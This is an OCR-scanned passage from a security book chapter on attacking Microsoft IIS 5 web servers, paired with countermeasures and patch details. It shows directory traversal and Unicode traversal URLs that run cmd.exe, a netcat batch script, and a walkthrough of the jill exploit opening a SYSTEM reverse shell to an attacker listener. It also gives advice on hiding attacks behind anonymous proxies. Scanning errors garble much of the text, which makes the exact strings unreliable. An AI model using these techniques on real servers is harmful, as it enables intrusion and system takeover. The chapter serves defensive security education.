is implemented as an ISAPI DLL. Blurs the line between /^P- and ISAPI-based applications, 
no?). ISAPI DLLs are binary files that aren't given to human interpretation. They can run in- 
side or outside the IIS process itself (inetinfo.exe) and, once instantiated, they stay resident, 
thus, greatly trimming the overhead of spawning a process for a CGI executable to service 
each request. If you know the name of an IS/kPI DLL, it can be called via HTTP: 

http : II WWW . victim . com/isapi . dl 1 ? var i able 1& variable 2 

The results of calling an ISAPI DLL directly like this vary greatly depending on how 
it's constructed and this isn't useful, other than to retrieve the DLL itself for subsequent 
analysis using BinText (www.foundstone.com) or another string extraction tool, if possi- 
ble. Entire books have been written about the IIS process model, ASP, and ISAPI, and 
we're going to stop short here and reference one of our favorites. Running Internet Infor- 
mation Server (see the "References and Further Reading" section at the end of this chapter). 
The discussion so far covers about all you need to know to begin hacking away. 

Common HTTP Tricks 

What do hackers do with HTTP? Basically, they try to trick it into coughing up data it 
shouldn't. The following concepts are typically used to attack Web servers. 

File System T reversal Using ../ We can't count how many times the oT "dot dot slash" tech- 
nique has extracted sensitive data from Web servers we've reviewed. Here's an example: 

http : / / WWW . victim . com/ ../../../../.. /winnt / secret . txt 

This most often results from inadequate NTFS AGLs on the directory in question. In 
our example, you can see we traversed back up the file system into the system directory to 
obtain a file called "secret.txt," which probably wasn't an intended behavior for this site. 

IIS 2.0 was vulnerable to this t)q)e of exploit, and was corrected early on. However, 
many third-party Web applications, or "quick and dirty" Web servers integrated into 
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various appliances are still vulnerable to this attack. One prominent example of such an 
integrated Web server is the Compaq Insight Manager (CIM) Web server that ships with 
most Compaq server hardware to enable remote, HTTP-based management. CIM was 
vulnerable to dot-dot-slash exploitation until patched sometime in 1999. CIM listens on 
port 2301 and vulnerable versions are still exploitable using a URL like the following one: 

http : / / victim . com :2301/. ./. ./. . /winnt /repair /sam._ 

See fhe "References and Further Reading" section for a link fo a fix for fhis CIM issue. 
We identify and show you how to exploit similar problems on IIS 5 in the upcoming section 
on file system traversal attacks. 

Hex Encoding URLs HTTP allows for characters to be entered in hexadecimal form in a 
URL. A list of commonly substituted hex values and their ASCII equivalents is shown in 
Table 10-1. These values are the most often used as they represent file system parameters 
like slash, dot, and so on. The following shows a sample URL wifh spaces in it to illustrate 
how hexadecimal encoding is t 5 q)ically used. In this case, it's to represent spaces in "the 
name of the file.txt": 

http : / / WWW . victim . com/ files /the%2 0name%2 Oof %2 0the%2 0 file . txt 

A sample URL craftily encoded to perform dot-dot-slash silliness is shown in the follow- 
ing, where the forward slashes have been replaced by their hexadecimal equivalent, %2F: 

http : II WWW . victim . com/ . . %2F . . % 2 Fwinnt /secret . txt 

This can be useful for avoiding infrusion detection systems or tripping up applications 
that mishandle the hex input. Once again, we identify and show you how to exploit similar 
problems on IIS 5 in the upcoming section on file system traversal attacks. 



ASCII 


Hex 


[space] 


%20 


Plus (+) 


%2B 


Period (.) 


%2E 


Forward slash (/) 


%2F 


Colon (:) 


%3A 


Question mark (?) 


%3F 


Backslash (\) 


%5C 



Table 10-1. Selected ASCII Characters and Their Hexadecimal Equivalents Commonly Used In 
Web Hacking 
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Bouncing Through Proxies Sophisticated Web hackers usually launder their attacks 
through an anonymous Internet proxy server, so their source IP address won't be 
found in the logs of the target server. Such proxies abound on the Internet — try 
searching for the word "anonymous Internet proxy" on your favorite search engine or 
go to http://proxys4all.cgi.net. 

The Basic Web Hacking Tooi: netcat 

Besides a browser, one of the simplest tools to perform Web hacking is the Swiss Army 
knife of networking, netcat, which we discuss frequently throughout this book. In fact, 
netcat has some clear advantages over a browser: 

T It allows raw HTTP input — some browsers like Internet Explorer prune 
extraneous input like ../../../ (dot-dot-slash). This can be quite maddening 
for would-be Web hackers. 

▲ Raw HTTP output is returned to standard out, which allows much more 
granular analysis of fhe server response than is possible in a browser, which 
simply renders the HTML (obfuscating juicy data like comments in the 
source code, and so on). 

In Chapter 3, we discussed the use of netcat in barmer grabbing and this is exactly the 
same way it's used for general Web hacking. To conned to a Web server, use netcat as 
shown in the following example. Once connecfed, enter the HTTP request in raw format. 
In this example, you use GET / HTTP/ 1.0, which requests the default file in the Webroot 
directory. Pollow this with two swats of the ENTER key (we have highlighted entry of two 
carriage returns as [CRLP][CRLP]): 

C:\>nc -w www.victim.com 80 

www.victim.com [192.168.234.45] 80 (http) open 

GET / HTTP/1.0 
[CRLF] 

[CRLF] 

HTTP/1.1 400 Bad Request 

Server: Microsoft-IIS/5 . 0 

Date: Thu, 05 Apr 2001 02:58:37 GMT 

Content-Type: text/html 

Content-Length: 87 

<html> 

<headxtitle>Error</t it lex/head> 

<body>The parameter is incorrect. </body> 

</html> 

sent 2, rcvd 224: NOTSOCK 

The raw HTTP response is returned to the console, showing the HTTP headers (in- 
cluding the server t}q)e, IIS 5) and any HTML or script output. 
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You can create text files with preconfigured input that can be redirected through 
netcat to save time. For example, create a file called get.txt containing: 

GET / HTTP/1.0 
[CRLF] 

[CRLF] 



Then redirect it through netcat like so: 

C:\>nc -w www.victim.com 80 < get.txt 

The result is exactly the same as shown in the previous example. 



^()TE 



We reuse this simple technique often in this chapter to demonstrate several different IIS 



If you want to take one further step in automation, you can create a batch 
webhack.bat, which looks like this: 



5 exploits, 
file called 



0echo off 

if '%!'=='' goto : syntax 
if '%2'=='' goto : syntax 
no -vv %1 80 < %2 
goto :eof 
: syntax 

echo usage: webhack ^<target^> ''<input_f ile''> 
: eof 



As you can see, webhack.baf fakes fhe first variable supplied on the command line as the 
DNS name or IP address of fhe target system and the second parameter as the input file fo 
be redirected to netcat. Here's an example of how webhack.bat could be used with the 
get.txt input file previously discussed 

C:\>webhack www.victim.com get.txt 

Although the example presented here performs a basic "barmer grab" from the target 
Web server, this same technique can be extended to perform nearly any feasible attack on 
a Web server, as we illustrate graphically in the upcoming sections on IIS 5 attacks. 

Of course, although netcat is handy for one-at-a-time server analysis, it doesn't excel 
at scarming networks of servers (although it could be scripted to do so fairly easily), 
netcat also cannot cormect to SSL-protected servers because it can't negotiate such con- 
nections. We discuss some other tools that improve on these drawbacks in an upcoming 
section entitled, "Web Server Security Assessment Tools." 
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Now that we've laid some groundwork for Web hacking and discussed the basic 
toolkit, let's talk about some specific IIS 5 attacks: 

▼ Buffer overflows 

■ File system traversal 

▲ Source code revelation 

IIS 5 Buffer Overflows 

Practically exploitable remote buffer overflows on Windows are rare, but many of the 
most serious have been discovered in IIS. The first was the .htr buffer overflow exploit 
against IIS 4, discovered by eEye Digital Security in June 1999 and, as you see in this section, 
eEye has continued this streak with IIS 5 in grand form. 

Of course, critical to understanding these exploits is a basic comprehension of how 
buffer overflows work. A detailed examination of practical buffer overflow exploitation 
is outside of the scope of the discussion here but, in essence, buffer overflows occur when 
programs don't adequately check input for appropriate length. Thus, any unexpected in- 
put "overflows" on to another portion of the CPU execution stack. If fhis input is chosen 
judiciously by a rogue programmer, it can be used to launch code of the programmer's 
choice. The key element is to craft so-called "shellcode" and position it near the point 
where the buffer overflows the execution stack, so the shellcode winds up in an identifi- 
able location on the stack, which can then be returned to and executed. We refer to this 
concept frequently in the upcoming discussion, and recommend consulting the "Refer- 
ences and Purther Reading" section on buffer overflows for fhose who want to explore 
the topic in more detail. 

Einally, because IIS runs under the SYSTEM account context, buffer overflow exploifs 
often allow arbitrary commands to be run as SYSTEM on the target system. As you saw in 
Chapter 2, SYSTEM is the most powerful account on a Windows machine and, therefore, 
remote buffer overflow attacks are about as close to hacking nirvana as you can get. We 
illustrate the devastation that can be wrought by these attacks in this section. 

^IPP Buffer Overflow 



Popularity: 


10 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


10 



In May 2001, eEye Digital Security armounced discovery of a buffer overflow within 
the ISAPI filter that handles .printer files (C:\WINNT\System32\msw3prf.dll) to pro- 
vide Windows 2000 with support for fhe Infemet Printing Protocol (IPP). IPP enables the 
Web-based control of various aspects of nefworked prinfers. 
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The vulnerability arises when a buffer of approximately 420 bytes is sent within the 
HTTP Host: header for a .prinfer ISAPl request, as shown in the following example, 
where [buffer] is approximafely 420 characfers. 

GET /NULL. printer HTTP/1.0 
Host: [buffer] 

This simple request causes the buffer overflow and would normally half IIS; however, 
Windows 2000 automatically restarts IIS (inetinfo.exe) after such crashes to provide 
greater resiliency for Web services. Thus, fhis exploit produces no visible effects from a 
remofe perspective (unless looped continuously to deny service). While the resiliency 
feature might keep IIS running in the event of random faulfs, if actually makes it easier to 
exploit the IPP buffer overflow fo run code of the attacker's choice. 

eEye released a proof-of-concept exploit that wrote a file to C:\www.eEye.com.txt, 
but with properly crafted shellcode, nearly any action is possible because the code executes 
in the context of the IIS process, which is to say SYSTEM. 

Sure enough, right on the heels of the IPP buffer overflow advisory, an exploit called [ill 
was posted to many popular security mailing lists by dark spyrit of beavuh.org. Alfhough 
jill is written in UNIX C, compiling if on Windows 2000 is a snap wifh the Cygwin environ- 
ment. Cygwin compiles UNIX code with an "abstraction layer" library — cygwinl.dll — that 
intercepts the native UNIX calls and translates them into Win32 equivalents. Thus, as long 
as the cygwinl.dll is in the working path from where fhe compiled execufable is run, if 
fimcfions on Wrn32 jusf as if would under UNIX or Linux. Here's how fo compile jill using 
Cygwin: firsf, sfarf fhe Cygwin UNIX environmenf (fhe default shell is bash), navigate to 
the directory where the jill source code resides (jiU.c), and then invoke the GNU C Compiler 
(gcc) to compile the binary like so (-o specifies fhe output file of fhe compilation, which imder 
UNIX doesn't require the .exe extension): 

$ gcc -o jill jill.c 

Once completed, a compiled jill.exe file appears in fhe working directory. The .exe ex- 
tension is added by Cygwin automatically. 

$ Is 

jill.c jill. exe 

This binary can be run either from the Cygwin shell or from a Wm32 console if 
cygwinl .dll is in fhe pafh. Here's how to run it from fhe Cygwin shell, wifhouf the .exe ex- 
tension and with the "./"current directory syntax as would be common under UNIX: 

$ ./jill 

iis5 remote .printer overflow. 

dark spyrit <dspyrit0beavuh . org> / beavuh labs. 

usage: ./jill <victimHost> <victimPort> <attackerHost> <attackerPort> 

Por subsequent demonstrations, we'll run jill.exe from a Windows 2000 command console 
(again, assume cygwinl.dll is in the path). 
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jill essentially exploits the IPP buffer overflow and "shovels a shell" back to the at- 
tackers system (see Chapter 7 for defails on shell shoveling). The shoveled shell runs in 
fhe confexf of fhe SYSTEM accounf, allowing the attacker to execute any arbitrary command 
on the victim. 




The default Web site on the victim server stops if the shoveled shell isn’t able to connect, if it isn’t exited 
gracefully, or if some other error occurs. Attempts to start the Web site from the console on the victim 
server then fail, and the machine needs to be rebooted to recover from this condition. 



Here's how the exploit works. First, start listener on attacker's system: 

C:\>nc -w -1 -p 2002 

listening on [any] 2002 . . . 



Then, launch exploit targeted at attacker's listener: 

C:\>jill 192.168.234.222 80 192.168.234.250 2002 

iis5 remote .printer overflow. 

dark spyrit <dspyrit0beavuh . org> / beavuh labs. 



connecting . . . 
sent . . . 

you may need to send a carriage on your listener if the shell doesn't appear, 
have fun ! 

If everything goes as planned, shortly after the exploit executes, a remote shell is shov- 
eled to the attacker's listener. You might have to strike a carriage return to make the shell 
appear once you see the connection has been received — and also after each subsequent 
command — as shown in the ensuing example (again, this occurs on the attacker's system): 

C:\>nc -w -1 -p 2002 

listening on [any] 2002 . . . 

connect to [192.168.234.250] from MANDALAY [192.168.234.222] 1117 

[carriage return] 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) Copyright 1985-1999 Microsoft Corp. 

C : \WINNT\system32> 

C : \WINNT\system32>whoami 
whoami 

[carriage return] 

NT AUTHORITY\SYSTEM 
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We used the whoami utility from the Windows 2000 Resource Kit to show this shell is 
rurming in the context of the all-powerful LocalSystem account from the remote machine. 

Because the initial attack occurs via the Web application charmel (port 80, typically) 
and because the shell is shoveled outbound from the victim Web server on a port defined 
by the attacker, this attack is difficult to stop using router or firewall filtering. 

A native Win32 version of jill called jill-win32 was released soon after the UNIX/ 
Linux version. A hacker named CyrusTheGreat released his own version of this exploit, 
based on the shellcode from jill, called iisShack. All these tools work exactly the same 
way as previously demonstrated, including the need to be careful with closing the 
shoveled shell. 




Remember to exit this remote sheii gracefully (by typing exit) or the default Web site on the victim 
server will halt and no longer be able to service requests! 



O Countermeasures for the IPP Buffer Overflow 



Vendor Bulletin: 


MSOl-023 


Bugtraq ID: 


2674 


Fixed in SP: 


2 


Log Signature: 


N 



Like many IIS vulnerabilities that we'll explore shortly, the IPP exploit takes advan- 
tage of a bug in an IS API DLL that ships with IIS 5 and is configured by default to handle 
requests for certain file types. As mentioned earlier, this ISAPI filter resides in 
C:\WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the 
IPP. Assuming such functionality isn't needed on your Web server, removing the appli- 
cation mapping for this DLL to .printer files (and optionally deleting the DLL itself) prevents 
the buffer overflow from being exploited because the DLL won't be loaded into the IIS 
process when it starts up. Because of the many security issues associated with ISAPI DLL 
mappings, this is one of the most important countermeasures to implement when securing IIS, and 
we will repeat it time and again in this chapter. 

To unmap DLLs from file extensions, right-click the computer you want to administer 
and select Properties I Master Properties I WWW Service I Edit I Properties of the Default 
Web Site I Home Directory I Application Settings I Configuration I App Mappings, and 
then remove the mapping for .htr to ism.dll, as shown in Figure 10-1. 

Microsoft has also released a patch for the buffer overflow, but removing the ISAPI 
DLL is a more proactive solution in the instance that additional vulnerabilities are foimd 
with the code. The patch is available in MSOl-023. 
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Figure 10-1. To prevent the .printer buffer overflow exploit and many like it that rely on built-in 

ISAPI filters, simply remove the application mappings for the appropriate extension in 
the IIS Admin tool (iis.msc) 



/ 

Indexing Services ISAPI Extension Buffer Overflow 



Popularity: 


10 


Simplicity: 


7 


Impact: 


10 


Risk Rating: 


9 



Soon after eEye discovered the IPP printer buffer overflow, they identified a similar 
issue in yet another IIS ISAPI DLL — idq.dll — ^which is a component of the Windows 2000 
Indexing Service (called Index Server under NT) and provides support for administrative 
scripts (.ida files) and Internet Data Queries (.idq files). Thus, we sometimes refer to this 
issue as the "ida/idq buffer overflow." 
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Exploitation of the buffer overflow involves sending an overlong variable to idq.dll, as 
shown in the following example, where [buffer] is equivalent to approximately 240 bytes: 

GET / null . ida? [buffer]=X HTTP/1.1 
Host: [arbitrary_value] 

Note that the file null.ida doesn'f have to exist. The .ida extension is all that's needed 
to trigger the idq.dll functionality. Again, idq.dll has the buffer overflow. The exploit 
never actually reaches Indexing Services and, therefore, doesn't require it to be activated. 
Also note that the value of fhe variable, in this case X, is simply an arbitrarily chosen one, 
as is the contents of fhe Hosts: header field. 

Like fhe IPP buffer overflow, the IIS process is halted momentarily before if's re- 
sfarted by Windows 2000 redundancy feafures. Unlike fhe IPP attack, eEye didn'f release 
proof-of-concept exploit code for fhe ida/idq bffer overflow. This is likely because of the 
difficulty of exploifing the nature of this particular buffer overflow, which doesn't permit 
simple loading of shellcode info a predefined locafion in memory. Instead, eEye claimed 
it was forced to load the shellcode into an area of memory called fhe heap, using a "spray" 
fechnique it termed forceful heap violation. In the authors' experience, attempting to design 
such an exploit is nontrivial and, because of fhe unpredicfable nafure of the heap, must be 
custom tailored to different versions of fhe fargef IIS version (for example, the IIS 4 exploit 
would necessarily be different than the IIS 5). 

Thus, with the exception of a few unreliable pieces of code, currenfly no publicly 
available exploifs exisf for fhe ida/idq buffer overflow. The aufhors are aware of func- 
fional buf unreleased exploifs for this problem, however. Nevertheless, this vulnerability 
has been exploited to great effect on Web servers worldwide, as we discuss next. 

The Code Red Worm On July 17, 2001, eEye Digital Security reported the existence of an 
Internet worm that exploited the ida/ idq buffer overflow vulnerability it had published 
less than a month earlier. A ivorm is a generic term for a piece of software that replicates it- 
self to computers on a network. T 5 q?ically, worms exploit some popular remote security 
flaw to infect systems, take control of the victim, perform some nasty action (such as defacing 
a Web site), and then set about launching new attacks against further victims. 

The Code Red Worm follows this basic pattern, with some interesting variations, as 
described in the following list of its activities on an infected host: 

1. Initial infection, worm is memory resident only. 

2. Sets up to 100 threads to launch remote attacks against a somewhat randomized 
list of IP addresses. 

3. Each fhread checks for the presence of fhe directory %systemdrive%\notworm. 
If fhis directory is present, the worm goes dormant. If not found, each thread 
continues to attack remote servers. 
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4. If the victim system is running the U.S. English version of Windows 2000, the 
local Web site is defaced with the phrase "Welcome to http:/ /www.worm.com!. 
Hacked By Chinese!" This hacked Web page message stays "live" on the Web 
server for ten hours, and then disappears. 

5. Each thread checks the local system date. If the date is between the 20th and 27th of 
the month (GMT), the thread wiU stop searching for systems to infect and, instead, 
sends a flood of rmstructured data to TCP port 80 on 198.137.240.9 (which was 
www.whitehouse.gov up imtil late July 19, 2001, and is now no longer in use), 
potentially resulting in a Denial of Service (DoS) attack against that site. 

Code Red was thought to be created during the much-hyped "cyber war" between 
American and Chinese hackers during 2001 and was reported to have infected more than 
359,000 servers in a 14-hour period during July 19, 2001. The United States government 
was forced to change the IP address of www.whitehouse.gov to avoid the flood of data 
from so many infected machines. The flood did manage to affect the performance of the 
Internet overall when it occurred on July 20, according to some analysts. Code Red re- 
mained in the headlines of major media outlets for weeks following the initial outbreak, 
as it continued to spread to machines vulnerable to the ida/idq buffer overflow. 

Ironically, the Code Red Worm could have been much more damaging had its au- 
thor(s) coded the buffer overflow offset to work against IIS4 as well, as the worm targeted 
only Windows 2000 systems and, thus, left at least half of the Windows Internet presence 
untouched because it didn't infect IIS4 machines. Additionally, the worm only targeted the 
hard-coded IP address for www.whitehouse.gov, leaving an easy out for the United States 
government. The Internet was lucky this time and may not be so in the future. 

O Countermeasures for the ida/idq Buffer Overflow and Code Red 



Vendor Bulletin: 


MSOl-033 


Bugtraq ID: 


2880 


Fixed in SP: 


3 


Log Signature: 


Y 



Like the IPP buffer overflow, the ida / idq exploit takes advantage of a bug in an ISAPI 
DLL that ships with IIS 5 and is configured by default to handle requests for certain file 
types. This ISAPI filter resides in C:\WINNT\System32\idq.dll and provides support 
for Windows 2000's Indexing Services. Assuming such functionality isn't needed on your 
Web server, remove the application mapping for this DLL to .idq and .ida files (and, op- 
tionally, deleting the DLL itself). This prevents the buffer overflow from being exploited 
because the DLL won't be loaded into the IIS process when it starts up. Pigure 10-1 shows 
how to remove DLL mappings in IIS 5. 
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Microsoft has also produced a patch for this vulnerability, available from bulletin 
MSOl-033. It also recommend that anyone who suspects they've been infected by the 
Code Red Worm should reboot their system and install the patch before reconnecting to 
any networks. 

Web server logs on infected servers contained entries similar to the following: 

GET /default . ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 

NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090 

%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff 

%u0078%u0000%u00=a 

Also, the presence of the directory %systemdrive%\notworm is a tell-tale sign that a 
server has been compromised. 

/ 

iFrontPage 2000 Server Extensions Buffer Overflow 



Popularity: 


6 


Simplicity: 


9 


Impact: 


4 


Risk Rating: 


6 



The Chinese security research group NSFocus released an advisory on June 25, 2001, 
describing its discovery of a buffer overflow in the Front Page 2000 Server Extensions 
(FPSE 2000), a set of three programs that support features such as collaborative 
authoring, hit counters, email form-handling, and editing a Web site directly on a server 
computer (see the "References and Eurther Reading" section at the end of this chapter for 
a link to more information on EPSE 2000). EPSE 2000 is commonly installed by Internet 
service providers (ISPs) to enable customers to freely manage their own content hosted 
on the service provider's servers. EPSE 2000 is included in Windows 2000 and its compo- 
nents can be found under C:\Program EilesXCommon EilesX Microsoft SharedXWeb 
Server Extensions. 

A subcomponent of EPSE 2000 called Visual Studio RAD (Remote Application De- 
ployment) Support can be optionally installed. This subcomponent allows Visual 
InterDev 6.0 users to register and unregister COM objects on an IIS 4.0 or 5.0 server. This 
subcomponent is not installed by default with EPSE 2000, neither is it installed by default on 
IIS 4.0 or 5.0. Flowever, even though it isn't installed by default with IIS5 on Windows 2000, 
users have the option of selecting the vulnerable subcomponent using the Add /Remove 
Windows Components tool. If installed in this manner, the user is plainly warned that se- 
curity issues could result from this choice. 

Visual Studio RAD Support is implemented in the DLL fp30reg.dll. Another version 
of fp30reg.dll named fp4areg.dll is also available under the EPSE 2000 components direc- 
tory and is present by default under Windows 2000 whether Visual Studio RAD Support 
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is installed or not. fp4areg.dll isn't normally reachable via IIS, but by exploiting another 
vulnerability like the Unicode file system traversal issue, it can be reached and attacked 
(we discuss file system traversal attacks in the next section). 

When either of fhese DLLs receives a URL requesf longer than 258 bytes, a buffer 
overflow occurs. Exploiting this vulnerability successfully, an attacker can remotely execute 
arbitrary code on any unpatched server running FPSE 2000. 

NSFocus produced an exploit called fpse2000ex that takes advantage of this vulnera- 
bility. It released UNIX /Linux source code only. To compile this exploit under Cygwin, 
using the procedure discussed previously under the IPP buffer overflow, you mighf need 
fo add the following line fo fhe header includes section af fhe fop of the source code file: 

#include <sys/socket . h> 

Also, on line 209 of fhe source code, NSFocus leaves a tantalizing hint about a small modi- 
fication that allows the exploit to work against fp4areg.dll using the Unicode attack. You 
might consider compiling a second version with this modification. Once compiled with 
Cygwin, assuming the cygwinl.dll is in the path, the resulting executable fpse2000ex.exe 
will run fine on Windows 2000. 

Before rirrming fhe exploit, you might need to determine if the target server has the Vi- 
sual Studio RAD Support installed. You can do this by requesting the vulnerable fp30reg.dll 
file using netcat as follows. Firsf, create a file called fpse2000.fxt wifh fhe contenfs: 

GET /_vti_bin/_vti_aut/fp30reg . dll HTTP/1.0 
[carriage return] 

[carriage return] 

You can fhen redirecf fhis file fhrough nefcaf, as explained in fhe previous section on ba- 
sic Web hacking tools: 

C:\>nc -nw 192.168.234.34 80 < fpse2000.txt 

(UNKNOWN) [192.168.234.34] 80 (?) open 

HTTP/1.1 501 Not Implemented 

A server with fp30reg.dll available will return the "HTTP 501 Not Implemented" error 
shown here. If fp30reg.dll isn'f available, the server will return "HTTP 500 Server Error, 
module not found". Or, you can use anofher vulnerabilify like the Unicode file sysfem 
fraversal problem (discussed shortly) to target fp4areg.dll. Create another input file 
called fpse2000-2.txf with the following contents: 

GET /_vti_bin/ . . %cl%9cbin/ fp4areg . dll HTTP/1.0 
[carriage return] 

[carriage return] 

Redirecting this through netcat as previously shown can achieve the same results. In fact, 
because fp4areg.dll exists by default on Windows 2000, this method always works, (once 
again, assuming another file sysfem traversal vulnerability is present). 
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Once the FPSE 2000 DLLs have been identified, NSFocus' fpse2000ex exploit can be 
used. Simply point it toward the target Web server (optionally supplying at the Web 
server port number) and it launches the attack. You may need to press the ENTER key after 
the "exploit succeed" message to receive the shoveled shell from fhe remofe sysfem. 

C: \>fpse2000ex 192.168.234.34 

buff len = 2204 
payload sent ! 
exploit succeed 

[carriage return] 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) Copyright 1985-1999 Microsoft Corp. 

C : \WINNT\system32> 

C : \WINNT\system32>whoami 
whoami 

[carriage return] 

VICTIM\IWAM_victim 

As you can see by fhe oufpuf of fhe whoami ufilify from fhe Resource Kif, exploifafion 
of fhis buffer overflow on Windows 2000 yields compromise of fhe IW AM_machinename 
accounf, which possesses only Guesf-equivalenf privileges on fhe local sysfem. For more 
background on Guesfs and IW AM_inachinename, see Ghapfer 2. Thus, going fhrough fhe 
work of exploiting fhis issue is probably nof worfh if on IIS 5. On IIS 4, remofe SYSTEM 
compromise can be achieved. You did upgrade, didn'f you? 

We discuss a mechanism for escalafing privilege once Guesf-equivalenf access has 
been attained on IIS 5 in an upcoming secfion. Simpler exploifs fhan fhe FPSE 2000 buffer 
overflow can be used in conjimcfion wifh such attacks, as we also discuss in fhe upcoming 
secfion on file sysfem fraversal. 

Q Countermeasures for FPSE 2000 Buffer Overflow 



Vendor Bulletin: 


MSOl-035 


Bugtraq ID: 


2906 


Fixed in SP: 


3 


Log Signature: 


Y 



To check if your server has Visual Sfudio RAD Supporf insfalled: 

1 . Glick Add / Remove W indows Gomponenf s . 

2. If a check mark is presenf in fhe check box nexf fo Infemef Informafion Server, 
highlighf fhe fexf and click Defails. 
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3. In the next dialog box, scroll to the bottom of the list. The next to the last entry 
is Visual InterDev RAD Remote Deployment Support. If this box is checked, 
the subcomponent is installed. 

If you installed the subcomponent, you can remove it by uninstalling via this same 
screen. However, Microsoft recommends you still apply the patch to protect yourself if 
you decide to reinstall this feature at a later date. Once applied, the patch ensures the cor- 
rected component is present on your system, even if you decide to reinstall the feature at 
a later time. 

The patch also fixes fhe fp4areg.dll file, buf you can manually delefe fhis as well if you 
aren't rurming FPSE 2000. 

In the IIS logs, attacks using fp2000ex look similar to the following: 

GET /_vt i_bin/_vt i_aut /fpSOreg . dllyfxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaa [more a 's Jaaaaaaaa%cb • Ogb • Ogb • Ogb • Ogb • Ogb • Ogb • Ogb • Ogb • Ogb • Ogb 
• Ogb • Ogb • Ogb • Ogb • Ogb • OgbgaaaOut-of-process+ISAPI+extension+request+f ailed. 500 



File System Traversal 



Besides the buffer overflow attacks jusf described, fhe mosf debilitating IIS 4 and 5 vulnera- 
bilities armormced in the first part of 2001 were an imrelafed pair of file sysfem fraversal is- 
sues. Given a few unrelafed security misconfigurations on the same server, exploitation of 
fhese vulnerabUifies can lead to complete system compromise. Thus, although they don't 
have the same immediate impact of the buffer overflow attacks previously covered, they 
can be the next best thing. 

The two file system traversal exploits we examine in the following are fhe Unicode and 
fhe double decode (sometimes fermed superfluous decode) attacks. Firsf, we describe them in 
detail, and then we discuss some mechanisms for leveraging fhe initial access fhey provide 
into full-system conquest. 



llnicode File System Traversal 



Popularity: 


10 


Simplicity: 


8 


Impact: 


7 


Risk Rating: 


8 



First leaked in the Packetstorm forums in early 2001 and formally developed by Rain For- 
es! Puppy (RFP), the essence of fhe problem is explained mosf simply in RFP's own words: 
"%c0%af and %cl%9c are overlong UNICODE represenfafions for '/' and '\'. There 
might even be longer (3+ byte) overlong representations, as well. IIS seems to decode 
UNICODE at the wrong instance (after path checking, rather than before)." 

Thus, by feeding an HTTP requesf like fhe following to IIS, arbitrary commands can 
by executed on the server: 

GET /scripts /.. %c0%af .. /winnt /system32 /cmd . exe?+/c+dir+ ' c : \ ' HTTP /l.O 
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Note the overlong Unicode representation %c0%af makes it possible to use "dot-dot- slash" 
naughtiness to back up and into the system directory and feed input to the command shell, 
which is normally not possible using only ASCII characters. Several other "illegal" represen- 
tations of "/" and "\" are feasible as well, including %cl%lc, %cl%9c, %cl%lc, %c0%9v, 
%c0%af, %c0%qf, %cl%8s, %cl%9c, and %cl%pc. 

Clearly, fhis is undesirable behavior, buf the severity of fhe basic exploif is limited by 
a handful of mitigating factors: 

T The first virtual directory in the request (in our example, / scripts) must have 
Execute permissions for the requesting user. This usually isn't much of a 
deferrenf, as IIS commonly is configured with several directories that grant 
Execute to lUSR by default: scripts, iissamples, iisadmin, iishelp, cgi-bin, 
msadc, _vti_bin, certsrv, certcontrol, and certenroll. 

■ If fhe initial virtual directory isn't located on the system volume, it's impossible 
to jump to another volume because, currently, no publicly known syntax exists to 
perform such a jump. Because cmd.exe is locafed on fhe system volume, it thus 
can't be executed by the Unicode exploit. Of course, fhis doesn'f mean ofher 
powerful execufables don't exist on the volume where the Web site is rooted 
and Unicode makes looking around trivial. 

▲ Commands fired off via Unicode are execufed in the context of fhe remofe user 
making the HTTP request. T 5 q?ically, this is the lUSRjnachinename account 
used to impersonate anonymous Web requests, which is a member of fhe 
Guesfs builf-in group and has highly resfricfed privileges on defaulf Windows 
NT/ 2000 sysfems. 

Alfhough fhe scope of fhe compromise is limifed initially by these factors, if further 
exposures can be identified on a vulnerable server, fhe situation can quickly become 
much worse. As you see shortly, a combination of issues can fum fhe Unicode flaw into a 
severe security problem. 

O Unicode Countermeasures 



Vendor Bulletin: 


MSOO-057, 078, 086 


Bugtraq ID: 


1806 


Fixed in SP: 


2 


Log Signature: 


N 



A number of counfermeasures can mifigafe fhe Unicode file sysfem fraversal 
vulnerabilify. 

Apply the Patch from MSOO-086 According to Microsoft, Unicode file system traversal results 
from errors in IIS's file canonicalizafion routines: 

"Canonicalization is fhe process by which various equivalenf forms of a name can be re- 
solved to a single, standard name — the so-called canonical name. Eor example, on a given 
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machine, the names C:\dir\test.dat, test.dat and .A.. \test.dat might all refer to the same 
file. Canonicalizafion is fhe process by which such names would be mapped to a name like 
CAdir\test.dat. [Due to canonicalization errors in IIS.] . . . When certain types of files are re- 
quested via a specially malformed URL, fhe canonicalization yields a partially correct result. 
It locates the correct file buf concludes fhaf fhe file is located in a different folder than it 
actually is. As a result, it applies the permissions from fhe wrong folder." 

Microsoft had released a fix for relafed canonicalizafion errors in bulletin MSOO-057 
about two months previous to widespread publication of fhe Unicode exploif (fhe previ- 
ous quote is taken from MSOO-057). The Unicode vulnerabilify caused such a sfir in the 
hacking community that Microsoft released a second and third bulletins, MSOO-078 and 
-86, to specifically highlighf fhe importance of the earlier patch and to fix issues with the 
first two. The patch replaces w3svc.dll. The English version of this fix should have fhe fol- 
lowing affribufes or later: 

Date Time Version Size File name 



11/27/2000 10:12p 5.0.2195.2785 122,640 Iisrtl.dll 
11/27/2000 10:12p 5.0.2195.2784 357,136 W3svc.dll 

Use an automated tool like the Nework Hotfix Checking Tool fo help you keep 
up-fo-dafe on IIS pafches (see Appendix A). 

In addifion fo obfaining fhe pafch, IIS 5 adminisfrafors can engage in several ofher 
besf pracfices fo profecf fhemselves proactively from Unicode and fufure vulnerabilities 
like it (for example, fhe double decode bug discussed nexf). The following sef of recom- 
mendations is adapfed from Microsoff's recommendafions in MSOO-078 and amplified 
